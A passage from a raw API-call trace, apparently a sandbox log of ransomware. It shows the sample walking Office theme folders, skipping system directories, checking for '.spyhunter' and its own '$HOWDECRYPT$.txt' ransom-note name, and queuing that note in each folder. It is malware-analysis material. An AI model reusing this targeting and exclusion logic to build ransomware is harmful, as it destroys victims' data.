lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.472] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.472] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.472] lstrlenW (lpString="System Volume Information") returned 25 [0090.472] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\..") returned 66 [0090.472] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.472] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.472] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.472] lstrcmpiW (lpString1="ICE.ELM", lpString2="Windows") returned -1 [0090.472] lstrlenW (lpString="Windows") returned 7 [0090.472] lstrcmpiW (lpString1="ICE.ELM", lpString2="$Recycle.bin") returned 1 [0090.472] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.472] lstrcmpiW (lpString1="ICE.ELM", lpString2="System Volume Information") returned -1 [0090.472] lstrlenW (lpString="System Volume Information") returned 25 [0090.472] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM") returned 71 [0090.472] StrStrIW (lpFirst="ICE.ELM", lpSrch=".spyhunter") returned 0x0 [0090.472] lstrcmpW (lpString1="ICE.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.472] lstrcmpW (lpString1="ICE.ELM", lpString2="_uninstalling_.png") returned 1 [0090.472] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM") returned 71 [0090.472] GetProcessHeap () returned 0x2c0000 [0090.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37df78 [0090.472] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x10f0) returned 0x3824f8 [0090.472] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.472] lstrcmpiW (lpString1="ICE.INF", lpString2="Windows") returned -1 [0090.472] lstrlenW (lpString="Windows") returned 7 [0090.472] lstrcmpiW (lpString1="ICE.INF", lpString2="$Recycle.bin") returned 1 [0090.472] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.472] lstrcmpiW (lpString1="ICE.INF", lpString2="System Volume Information") returned -1 [0090.473] lstrlenW (lpString="System Volume Information") returned 25 [0090.473] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF") returned 71 [0090.473] StrStrIW (lpFirst="ICE.INF", lpSrch=".spyhunter") returned 0x0 [0090.473] lstrcmpW (lpString1="ICE.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.473] lstrcmpW (lpString1="ICE.INF", lpString2="_uninstalling_.png") returned 1 [0090.473] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF") returned 71 [0090.473] GetProcessHeap () returned 0x2c0000 [0090.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e128 [0090.473] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x10f8) returned 0x3824f8 [0090.473] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.473] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.473] lstrlenW (lpString="Windows") returned 7 [0090.473] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.473] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.473] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.473] lstrlenW (lpString="System Volume Information") returned 25 [0090.473] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 75 [0090.473] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.473] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.473] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.473] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 75 [0090.473] GetProcessHeap () returned 0x2c0000 [0090.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x3865c0 [0090.473] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1100) returned 0x3824f8 [0090.473] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.473] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.473] lstrlenW (lpString="Windows") returned 7 [0090.473] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.474] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.474] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.474] lstrlenW (lpString="System Volume Information") returned 25 [0090.474] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 76 [0090.474] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.474] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.474] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.474] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 76 [0090.474] GetProcessHeap () returned 0x2c0000 [0090.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x375268 [0090.474] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1108) returned 0x3824f8 [0090.474] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.474] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.474] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\$HOWDECRYPT$.txt") returned 80 [0090.474] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\$HOWDECRYPT$.txt") returned 80 [0090.474] GetProcessHeap () returned 0x2c0000 [0090.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x3412d0 [0090.474] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1110) returned 0x3824f8 [0090.475] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.475] lstrcmpiW (lpString1="INDUST", lpString2="Windows") returned -1 [0090.475] lstrlenW (lpString="Windows") returned 7 [0090.475] lstrcmpiW (lpString1="INDUST", lpString2="$Recycle.bin") returned 1 [0090.475] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.475] lstrcmpiW (lpString1="INDUST", lpString2="System Volume Information") returned -1 [0090.475] lstrlenW (lpString="System Volume Information") returned 25 [0090.475] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST") returned 66 [0090.475] lstrcmpW (lpString1="INDUST", lpString2=".") returned 1 [0090.475] lstrcmpW (lpString1="INDUST", lpString2="..") returned 1 [0090.475] GetProcessHeap () returned 0x2c0000 [0090.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.476] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\*") returned 68 [0090.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.492] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.492] lstrlenW (lpString="Windows") returned 7 [0090.492] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.492] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.492] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.492] lstrlenW (lpString="System Volume Information") returned 25 [0090.492] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\.") returned 68 [0090.492] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.492] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.492] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.492] lstrlenW (lpString="Windows") returned 7 [0090.492] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.492] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.492] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.492] lstrlenW (lpString="System Volume Information") returned 25 [0090.492] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\..") returned 69 [0090.493] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.493] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.493] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.493] lstrcmpiW (lpString1="INDUST.ELM", lpString2="Windows") returned -1 [0090.493] lstrlenW (lpString="Windows") returned 7 [0090.493] lstrcmpiW (lpString1="INDUST.ELM", lpString2="$Recycle.bin") returned 1 [0090.493] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.493] lstrcmpiW (lpString1="INDUST.ELM", lpString2="System Volume Information") returned -1 [0090.493] lstrlenW (lpString="System Volume Information") returned 25 [0090.493] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM") returned 77 [0090.493] StrStrIW (lpFirst="INDUST.ELM", lpSrch=".spyhunter") returned 0x0 [0090.493] lstrcmpW (lpString1="INDUST.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.493] lstrcmpW (lpString1="INDUST.ELM", lpString2="_uninstalling_.png") returned 1 [0090.493] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM") returned 77 [0090.493] GetProcessHeap () returned 0x2c0000 [0090.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x374ec8 [0090.493] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x10f8) returned 0x3824f8 [0090.493] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.493] lstrcmpiW (lpString1="INDUST.INF", lpString2="Windows") returned -1 [0090.493] lstrlenW (lpString="Windows") returned 7 [0090.493] lstrcmpiW (lpString1="INDUST.INF", lpString2="$Recycle.bin") returned 1 [0090.493] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.493] lstrcmpiW (lpString1="INDUST.INF", lpString2="System Volume Information") returned -1 [0090.493] lstrlenW (lpString="System Volume Information") returned 25 [0090.493] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF") returned 77 [0090.493] StrStrIW (lpFirst="INDUST.INF", lpSrch=".spyhunter") returned 0x0 [0090.494] lstrcmpW (lpString1="INDUST.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.494] lstrcmpW (lpString1="INDUST.INF", lpString2="_uninstalling_.png") returned 1 [0090.494] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF") returned 77 [0090.494] GetProcessHeap () returned 0x2c0000 [0090.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372ec8 [0090.494] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1100) returned 0x3824f8 [0090.494] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.494] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.494] lstrlenW (lpString="Windows") returned 7 [0090.494] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.494] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.494] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.494] lstrlenW (lpString="System Volume Information") returned 25 [0090.494] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 78 [0090.494] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.494] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.494] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.494] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 78 [0090.494] GetProcessHeap () returned 0x2c0000 [0090.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x37f880 [0090.495] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1108) returned 0x3824f8 [0090.495] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.495] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.495] lstrlenW (lpString="Windows") returned 7 [0090.495] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.495] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.495] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.495] lstrlenW (lpString="System Volume Information") returned 25 [0090.495] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 79 [0090.495] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.495] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.495] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.495] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 79 [0090.495] GetProcessHeap () returned 0x2c0000 [0090.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x37f968 [0090.495] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1110) returned 0x3824f8 [0090.495] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.495] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.495] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\$HOWDECRYPT$.txt") returned 83 [0090.495] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\$HOWDECRYPT$.txt") returned 83 [0090.495] GetProcessHeap () returned 0x2c0000 [0090.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x345378 [0090.496] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1118) returned 0x3824f8 [0090.497] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.497] lstrcmpiW (lpString1="IRIS", lpString2="Windows") returned -1 [0090.497] lstrlenW (lpString="Windows") returned 7 [0090.497] lstrcmpiW (lpString1="IRIS", lpString2="$Recycle.bin") returned 1 [0090.497] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.497] lstrcmpiW (lpString1="IRIS", lpString2="System Volume Information") returned -1 [0090.497] lstrlenW (lpString="System Volume Information") returned 25 [0090.497] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS") returned 64 [0090.497] lstrcmpW (lpString1="IRIS", lpString2=".") returned 1 [0090.497] lstrcmpW (lpString1="IRIS", lpString2="..") returned 1 [0090.497] GetProcessHeap () returned 0x2c0000 [0090.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0090.497] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\*") returned 66 [0090.497] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.497] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.497] lstrlenW (lpString="Windows") returned 7 [0090.497] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.497] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.497] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.498] lstrlenW (lpString="System Volume Information") returned 25 [0090.498] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\.") returned 66 [0090.498] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.498] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.498] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.498] lstrlenW (lpString="Windows") returned 7 [0090.498] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.498] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.498] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.498] lstrlenW (lpString="System Volume Information") returned 25 [0090.498] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\..") returned 67 [0090.498] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.498] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.498] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.498] lstrcmpiW (lpString1="IRIS.ELM", lpString2="Windows") returned -1 [0090.498] lstrlenW (lpString="Windows") returned 7 [0090.498] lstrcmpiW (lpString1="IRIS.ELM", lpString2="$Recycle.bin") returned 1 [0090.498] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.498] lstrcmpiW (lpString1="IRIS.ELM", lpString2="System Volume Information") returned -1 [0090.498] lstrlenW (lpString="System Volume Information") returned 25 [0090.498] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.ELM") returned 73 [0090.498] StrStrIW (lpFirst="IRIS.ELM", lpSrch=".spyhunter") returned 0x0 [0090.498] lstrcmpW (lpString1="IRIS.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.498] lstrcmpW (lpString1="IRIS.ELM", lpString2="_uninstalling_.png") returned 1 [0090.498] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.ELM") returned 73 [0090.498] GetProcessHeap () returned 0x2c0000 [0090.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x3866a0 [0090.499] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1120) returned 0x3824f8 [0090.499] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.500] lstrcmpiW (lpString1="IRIS.INF", lpString2="Windows") returned -1 [0090.500] lstrlenW (lpString="Windows") returned 7 [0090.500] lstrcmpiW (lpString1="IRIS.INF", lpString2="$Recycle.bin") returned 1 [0090.500] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.500] lstrcmpiW (lpString1="IRIS.INF", lpString2="System Volume Information") returned -1 [0090.500] lstrlenW (lpString="System Volume Information") returned 25 [0090.500] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF") returned 73 [0090.500] StrStrIW (lpFirst="IRIS.INF", lpSrch=".spyhunter") returned 0x0 [0090.500] lstrcmpW (lpString1="IRIS.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.500] lstrcmpW (lpString1="IRIS.INF", lpString2="_uninstalling_.png") returned 1 [0090.500] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF") returned 73 [0090.500] GetProcessHeap () returned 0x2c0000 [0090.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x345848 [0090.501] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1128) returned 0x3824f8 [0090.501] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.501] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.501] lstrlenW (lpString="Windows") returned 7 [0090.501] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.501] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.501] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.501] lstrlenW (lpString="System Volume Information") returned 25 [0090.501] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 76 [0090.501] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.501] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.501] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.501] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 76 [0090.501] GetProcessHeap () returned 0x2c0000 [0090.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x37fa50 [0090.501] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1130) returned 0x3824f8 [0090.501] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.501] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.501] lstrlenW (lpString="Windows") returned 7 [0090.501] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.502] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.502] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.502] lstrlenW (lpString="System Volume Information") returned 25 [0090.502] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 77 [0090.502] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.502] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.502] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.502] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 77 [0090.502] GetProcessHeap () returned 0x2c0000 [0090.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x37fb38 [0090.502] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1138) returned 0x3824f8 [0090.502] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.502] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.502] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\$HOWDECRYPT$.txt") returned 81 [0090.502] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\$HOWDECRYPT$.txt") returned 81 [0090.503] GetProcessHeap () returned 0x2c0000 [0090.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x345288 [0090.503] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1140) returned 0x3824f8 [0090.504] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.504] lstrcmpiW (lpString1="JOURNAL", lpString2="Windows") returned -1 [0090.504] lstrlenW (lpString="Windows") returned 7 [0090.504] lstrcmpiW (lpString1="JOURNAL", lpString2="$Recycle.bin") returned 1 [0090.504] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.504] lstrcmpiW (lpString1="JOURNAL", lpString2="System Volume Information") returned -1 [0090.504] lstrlenW (lpString="System Volume Information") returned 25 [0090.504] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL") returned 67 [0090.504] lstrcmpW (lpString1="JOURNAL", lpString2=".") returned 1 [0090.504] lstrcmpW (lpString1="JOURNAL", lpString2="..") returned 1 [0090.504] GetProcessHeap () returned 0x2c0000 [0090.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0090.505] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\*") returned 69 [0090.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\*", 